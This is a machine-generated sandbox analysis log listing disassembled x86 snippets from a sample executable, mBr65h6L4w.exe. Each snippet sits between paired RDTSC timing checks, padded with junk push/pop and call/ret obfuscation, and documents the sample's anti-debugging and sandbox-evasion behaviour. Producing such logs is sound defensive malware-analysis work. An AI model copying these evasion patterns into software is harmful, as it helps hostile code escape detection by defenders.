Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1217D75 second address: 1217DA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20406h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8C1CD20404h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1217DA5 second address: 1217DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63242h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1217DC4 second address: 1217DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F8C1CD203F6h 0x0000000d jmp 00007F8C1CD20402h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1217DE3 second address: 1217DEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1217DEB second address: 1217E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD203FCh 0x00000009 jp 00007F8C1CD203F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1218258 second address: 121825E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121825E second address: 1218271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121979B second address: 12197A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12197A1 second address: 12197A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12197A5 second address: 12197A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1219841 second address: 121987F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20402h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F8C1CD20409h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8C1CD203FAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1219FCB second address: 1219FD1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A3B6 second address: 121A3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD203FBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F8C1CD203F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A3CE second address: 121A3D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A461 second address: 121A465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A465 second address: 121A46B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A46B second address: 121A470 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A470 second address: 121A4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a js 00007F8C1CD63236h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 xchg eax, ebx 0x00000013 jbe 00007F8C1CD6323Ch 0x00000019 add dword ptr [ebp+129C19D4h], eax 0x0000001f mov esi, dword ptr [ebp+129C3A6Ch] 0x00000025 nop 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007F8C1CD63247h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A719 second address: 121A72B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C1CD203F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F8C1CD203F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A72B second address: 121A72F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A72F second address: 121A73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A952 second address: 121A956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A956 second address: 121A95C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121A9E4 second address: 121A9F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F8C1CD63238h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121B7E5 second address: 121B7E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121C973 second address: 121C986 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C1CD63238h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121C986 second address: 121C98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121C98A second address: 121C9A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121EEED second address: 121EF0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20404h 0x00000007 jl 00007F8C1CD203F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121D1F3 second address: 121D1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121EF0E second address: 121EF16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121D1FA second address: 121D1FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121EF16 second address: 121EF1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FF57 second address: 121FF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FF5D second address: 121FF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FF61 second address: 121FF73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C1CD63236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FC70 second address: 121FC76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FF73 second address: 121FF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FC76 second address: 121FC89 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F8C1CD203F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FC89 second address: 121FC93 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C1CD63236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121FC93 second address: 121FCA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD203FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12209ED second address: 1220A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov di, 8DE9h 0x0000000c push 00000000h 0x0000000e call 00007F8C1CD6323Eh 0x00000013 mov di, 24F7h 0x00000017 pop esi 0x00000018 push 00000000h 0x0000001a and edi, dword ptr [ebp+129C3908h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8C1CD6323Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1221500 second address: 1221521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push ecx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1225EB3 second address: 1225EB8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1227A60 second address: 1227A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1227A66 second address: 1227A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1227A6A second address: 1227A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122998E second address: 1229994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1229994 second address: 1229999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1229999 second address: 12299AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C1CD63238h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12299AB second address: 12299AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12299AF second address: 12299C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C1CD6323Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12299C5 second address: 12299C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122A923 second address: 122A991 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b je 00007F8C1CD63238h 0x00000011 mov ebx, ecx 0x00000013 push 00000000h 0x00000015 and ebx, dword ptr [ebp+129C398Ch] 0x0000001b mov ebx, dword ptr [ebp+129C1885h] 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F8C1CD63238h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000015h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d mov ebx, dword ptr [ebp+129C191Dh] 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 push edi 0x00000049 pop edi 0x0000004a popad 0x0000004b js 00007F8C1CD63240h 0x00000051 jmp 00007F8C1CD6323Ah 0x00000056 popad 0x00000057 push eax 0x00000058 jng 00007F8C1CD63244h 0x0000005e push eax 0x0000005f push edx 0x00000060 jp 00007F8C1CD63236h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1229BAF second address: 1229BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122AB06 second address: 122AB0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122AB0A second address: 122AB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122AB10 second address: 122AB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122AB16 second address: 122AB92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F8C1CD203F8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 sbb bx, 4C16h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f add dword ptr [ebp+129C27B9h], edx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007F8C1CD203F8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 adc bh, FFFFFF95h 0x00000059 mov edi, dword ptr [ebp+12B5EE5Eh] 0x0000005f mov eax, dword ptr [ebp+129C1745h] 0x00000065 push FFFFFFFFh 0x00000067 movzx edi, dx 0x0000006a push eax 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122AB92 second address: 122AB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122BB5E second address: 122BB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8C1CD203F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122BB68 second address: 122BC02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F8C1CD63241h 0x00000010 pop edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+129C295Dh], esi 0x0000001e mov dword ptr [ebp+12B5D0BDh], edx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b add bx, 8E0Ch 0x00000030 mov eax, dword ptr [ebp+129C0655h] 0x00000036 mov edi, 111141E9h 0x0000003b push FFFFFFFFh 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F8C1CD63238h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov dword ptr [ebp+129C204Bh], edx 0x0000005d pushad 0x0000005e mov dword ptr [ebp+129C29FBh], ebx 0x00000064 jmp 00007F8C1CD63249h 0x00000069 popad 0x0000006a push eax 0x0000006b push esi 0x0000006c push eax 0x0000006d push edx 0x0000006e jc 00007F8C1CD63236h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122CA4B second address: 122CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1230662 second address: 12306E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F8C1CD63238h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jmp 00007F8C1CD63242h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F8C1CD63238h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov di, F171h 0x0000004b push 00000000h 0x0000004d clc 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pushad 0x00000053 popad 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123165D second address: 12316C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a or bx, 12EEh 0x0000000f mov ebx, dword ptr [ebp+129C37F0h] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+12B3EEDBh], ebx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F8C1CD203F8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 call 00007F8C1CD20406h 0x0000003e jmp 00007F8C1CD203FDh 0x00000043 pop ebx 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12316C4 second address: 12316C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12316C8 second address: 12316CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12316CE second address: 12316D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123086E second address: 1230874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122D93C second address: 122D9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F8C1CD63238h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 adc bl, FFFFFFAAh 0x00000024 mov bx, ax 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov dword ptr [ebp+129C334Bh], edi 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b sub bl, FFFFFFA7h 0x0000003e mov eax, dword ptr [ebp+129C0E05h] 0x00000044 mov ebx, eax 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007F8C1CD63238h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 00000019h 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 mov edi, dword ptr [ebp+129C3A98h] 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push ebx 0x0000006c push esi 0x0000006d pop esi 0x0000006e pop ebx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1234540 second address: 1234546 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1231837 second address: 123183C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123CF23 second address: 123CF27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C6AC second address: 123C6CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8C1CD63248h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C6CA second address: 123C6D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C6D0 second address: 123C6F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63240h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F8C1CD63236h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C6F0 second address: 123C6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C6F4 second address: 123C6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C6F8 second address: 123C704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C704 second address: 123C70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123C88F second address: 123C89F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
